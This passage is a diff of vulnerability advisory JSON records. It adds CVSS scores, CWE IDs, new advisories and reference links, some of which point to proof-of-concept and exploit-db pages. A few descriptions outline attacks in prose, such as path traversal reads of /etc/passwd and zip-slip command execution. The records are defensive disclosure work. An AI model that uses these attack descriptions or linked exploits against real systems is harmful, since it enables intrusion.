"CVE-2017-6541" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/WPO-Foundation/webpagetest/issues/834" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6541.md" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96935" diff --git a/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json b/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json index f819db96889f0..2ff58806de1a0 100644 --- a/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json +++ b/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f6p2-2572-4pjp", - "modified": "2023-02-12T06:30:27Z", + "modified": "2026-02-13T18:31:21Z", "published": "2023-02-04T15:30:32Z", "aliases": [ "CVE-2023-0676" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/phpipam/phpipam/commit/94ec73ff1d33926b75b811ded6f0b4a46088a7ec" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2023-0676.md" + }, { "type": "WEB", "url": "https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b" diff --git a/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json b/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json index ec1169bfc8af9..810870c8729ed 100644 --- a/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json +++ b/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m77w-6vjw-wh2f", - "modified": "2025-10-22T00:32:51Z", + "modified": "2026-02-13T18:31:21Z", "published": "2023-10-03T18:30:23Z", "aliases": [ "CVE-2023-4911" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt" }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/52479" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5514" diff --git a/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json b/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json index 894979a1e4a75..8da2aba8e0444 100644 --- a/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json +++ b/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2g3f-rmh8-cj3f", - "modified": "2024-08-01T15:32:11Z", + "modified": "2026-02-13T18:31:21Z", "published": "2024-07-26T18:30:36Z", "aliases": [ "CVE-2024-41355" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://github.com/phpipam/phpipam/issues/4151" + }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2024-41355.md" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json b/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json index b0fd64a9bed9d..1b1ea338bedd4 100644 --- a/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json +++ b/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x34v-6wh4-m93r", - "modified": "2024-08-28T18:31:54Z", + "modified": "2026-02-13T18:31:21Z", "published": "2024-08-23T21:30:42Z", "aliases": [ "CVE-2024-42845" @@ -30,6 +30,10 @@ { "type": "WEB", "url": "https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845" + }, + { + "type": "WEB", + "url": "https://www.partywave.site/show/research/tic-tac-beware-of-your-scan" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json b/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json index 52ec270b94cbf..a31409f884714 100644 --- a/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json +++ b/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mqf-9q34-g8c2", - "modified": "2024-09-26T18:31:43Z", + "modified": "2026-02-13T18:31:21Z", "published": "2024-09-25T18:31:20Z", "aliases": [ "CVE-2024-44825" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-44825" + }, + { + "type": "WEB", + "url": "https://www.partywave.site/show/research/cve-2024-44825-invesalius-arbitrary-file-write-and-directory-traversal" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json b/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json index 28cfa25dc6b48..4e6d01952c490 100644 --- a/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json +++ b/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9w8w-fgjg-w972", - "modified": "2025-01-08T15:31:10Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-01-07T21:30:55Z", "aliases": [ "CVE-2024-54819" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://github.com/partywavesec/CVE-2024-55557" + }, + { + "type": "WEB", + "url": "https://www.partywave.site/show/research/cve-2024-54819-i-librarian-server-side-request-forgery" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json b/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json index 0aa516242b13f..78e4b4b3a2e37 100644 --- a/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json +++ b/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6v67-599p-fprc", - "modified": "2026-02-04T21:30:24Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-03-11T18:32:17Z", "aliases": [ "CVE-2025-24054" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://www.exploit-db.com/exploits/52478" }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/52480" + }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24054-spoofing-vulnerability-in-windows-ntlm-by-microsoft-detection-script" diff --git a/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json b/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json index a606c1457cf8f..c1250f1d77225 100644 --- a/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json +++ b/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9x7h-v87g-j6jw", - "modified": "2025-11-03T21:33:35Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-04-16T15:34:40Z", "aliases": [ "CVE-2025-22042" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: add bounds check for create lease context\n\nAdd missing bounds check for create lease context.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -45,7 +50,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-04-16T15:15:57Z" diff --git a/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json b/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json index 2d8112bee4640..b4113fb52372a 100644 --- a/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json +++ b/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rr66-qxh8-8qwq", - "modified": "2025-11-03T21:33:41Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-04-18T15:31:38Z", "aliases": [ "CVE-2025-38575" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: use aead_request_free to match aead_request_alloc\n\nUse aead_request_free() instead of kfree() to properly free memory\nallocated by aead_request_alloc(). This ensures sensitive crypto data\nis zeroed before being freed.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -49,7 +54,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-04-18T07:15:43Z" diff --git a/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json b/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json index 9c547ebccacdd..73b8e02f6ca39 100644 --- a/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json +++ b/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-45gw-fx24-h4pv", - "modified": "2025-11-03T21:33:45Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-05-01T15:31:44Z", "aliases": [ "CVE-2025-37778" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: Fix dangling pointer in krb_authenticate\n\nkrb_authenticate frees sess->user and does not set the pointer\nto NULL. It calls ksmbd_krb5_authenticate to reinitialise\nsess->user but that function may return without doing so. If\nthat happens then smb2_sess_setup, which calls krb_authenticate,\nwill be accessing free'd memory when it later uses sess->user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-05-01T14:15:41Z" diff --git a/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json b/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json index cd01d81fe78dc..ba3496731c0c4 100644 --- a/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json +++ b/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-75wh-ww84-2q6c", - "modified": "2025-11-03T21:33:45Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-05-01T15:31:44Z", "aliases": [ "CVE-2025-37775" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix the warning from __kernel_write_iter\n\n[ 2110.972290] ------------[ cut here ]------------\n[ 2110.972301] WARNING: CPU: 3 PID: 735 at fs/read_write.c:599 __kernel_write_iter+0x21b/0x280\n\nThis patch doesn't allow writing to directory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -41,7 +46,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-05-01T14:15:41Z" diff --git a/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json b/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json index 72397ebf2061f..a72de6e88a2fd 100644 --- a/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json +++ b/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4vjp-phjj-3f57", - "modified": "2025-11-05T00:31:24Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-08-13T18:31:24Z", "aliases": [ "CVE-2025-34153" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34153" }, + { + "type": "WEB", + "url": "https://community.hyland.com/resources/bulletins-and-notices/210540-security-update-hyland-timer-service-bulletin-ob2025-02" + }, { "type": "WEB", "url": "https://gist.github.com/VAMorales/32794cccc2195a935623a12ef32760dc" diff --git a/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json b/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json index a15e1d31feffe..988fb2d59f60f 100644 --- a/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json +++ b/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-79" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json b/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json index 36d4053526d62..e9c314581dda1 100644 --- a/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json +++ b/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2886-9536-rhhj", - "modified": "2025-11-13T18:31:05Z", + "modified": "2026-02-13T18:31:22Z", "published": "2025-11-13T18:31:05Z", "aliases": [ "CVE-2025-12784" ], "details": "Certain HP LaserJet Pro printers may be vulnerable to information disclosure leading to credential exposure by altering the scan/send destination address and/or modifying the LDAP Server.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json b/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json index 81e7266466163..b3ec5d510064b 100644 --- a/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json +++ b/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rfj8-8392-mfcm", - "modified": "2025-11-13T18:31:05Z", + "modified": "2026-02-13T18:31:22Z", "published": "2025-11-13T18:31:05Z", "aliases": [ "CVE-2025-12785" ], "details": "Certain HP LaserJet Pro printers may be vulnerable to information disclosure leading to credential exposure by altering the scan/send destination address and/or modifying the LDAP Server.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json index cc4fc102d8088..c8e47565d98ec 100644 --- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json +++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v6c5-9mp4-mwq4", - "modified": "2026-02-11T15:30:21Z", + "modified": "2026-02-13T18:31:23Z", "published": "2025-11-26T15:34:12Z", "aliases": [ "CVE-2025-13601" @@ -47,6 +47,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2072" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2064" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1736" diff --git a/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json b/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json index e705d9d130360..16244a5359ebd 100644 --- a/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json +++ b/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5wfc-7v23-c2vf", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-13T18:31:23Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47724" ], "details": "STVS ProVision 5.9.10 contains a path traversal vulnerability that allows authenticated attackers to access arbitrary files by manipulating the files parameter in the archive download functionality. Attackers can send GET requests to /archive/download with directory traversal sequences to read sensitive system files like /etc/passwd.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json index 7652fb69f6540..a46c72ac4d3be 100644 --- a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json +++ b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mc7-p6pj-r3f5", - "modified": "2026-01-21T00:31:42Z", + "modified": "2026-02-13T18:31:23Z", "published": "2026-01-21T00:31:42Z", "aliases": [ "CVE-2026-0865" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/python/cpython/commit/4802b96a2cde58570c24c13ef3289490980961c5" }, + { + "type": "WEB", + "url": "https://github.com/python/cpython/commit/66da7bf6fe7b81e3ecc9c0a25bd47d4616c8d1a6" + }, { "type": "WEB", "url": "https://github.com/python/cpython/commit/e4846a93ac07a8ae9aa18203af0dd13d6e7a6995" diff --git a/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json b/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json index a122bc92e7d86..9d3113da8a192 100644 --- a/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json +++ b/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jh94-8q48-f3m3", - "modified": "2026-01-26T15:31:19Z", + "modified": "2026-02-13T18:31:23Z", "published": "2026-01-23T18:31:30Z", "aliases": [ "CVE-2026-1299" @@ -47,6 +47,10 @@ "type": "WEB", "url": "https://github.com/python/cpython/commit/8cdf6204f4ae821f32993f8fc6bad0d318f95f36" }, + { + "type": "WEB", + "url": "https://github.com/python/cpython/commit/e417f05ad77a4c30ddc07f99e90fc0cef43e831a" + }, { "type": "WEB", "url": "https://cve.org/CVERecord?id=CVE-2024-6923" diff --git a/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json b/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json index 1faa991ec0136..3ff46cfdcb468 100644 --- a/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json +++ b/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json b/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json new file mode 100644 index 0000000000000..c74d239c86fb0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-224f-wm46-5p4r", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-66676" + ], + "details": "An issue in IObit Unlocker v1.3.0.11 allows attackers to cause a Denial of Service (DoS) via a crafted request.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66676" + }, + { + "type": "WEB", + "url": "https://github.com/cwjchoi01/CVE-2025-66676" + }, + { + "type": "WEB", + "url": "https://www.iobit.com/en/iobit-unlocker.php" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T18:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json index 26994f0e7141f..2eb69b7c705fb 100644 --- a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json +++ b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json b/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json new file mode 100644 index 0000000000000..c40923c22e7bf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3669-8ww5-g35f", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70094" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Generate Item Barcode function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Item Category parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70094" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos/pull/4357" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70094.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json index 54661722df369..7acac638a91ea 100644 --- a/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json +++ b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3q2x-q945-c5mm", - "modified": "2026-02-11T15:30:27Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-11T15:30:27Z", "aliases": [ "CVE-2019-25314" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://www.vulncheck.com/advisories/duplicate-post-persistent-cross-site-scripting" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duplicate-post/yoast-duplicate-post-323-authenticated-admin-stored-cross-site-scripting" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json b/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json new file mode 100644 index 0000000000000..8da634476cc20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gg4-26q8-wv28", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-69770" + ], + "details": "A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPortal CMS v2.9.0.1 allows attackers to execute arbitrary commands via uploading a crafted zip file.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69770" + }, + { + "type": "WEB", + "url": "https://github.com/i7MEDIA/mojoportal/security" + }, + { + "type": "WEB", + "url": "https://github.com/kid-tnt/Mojo-check/blob/main/Zipslip%20in%20MojoPortal%20version%202.9.0.1.md" + }, + { + "type": "WEB", + "url": "https://www.mojoportal.com/mojoportal-2-9-1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T18:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json b/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json new file mode 100644 index 0000000000000..f05c070281e27 --- /dev/null +++ 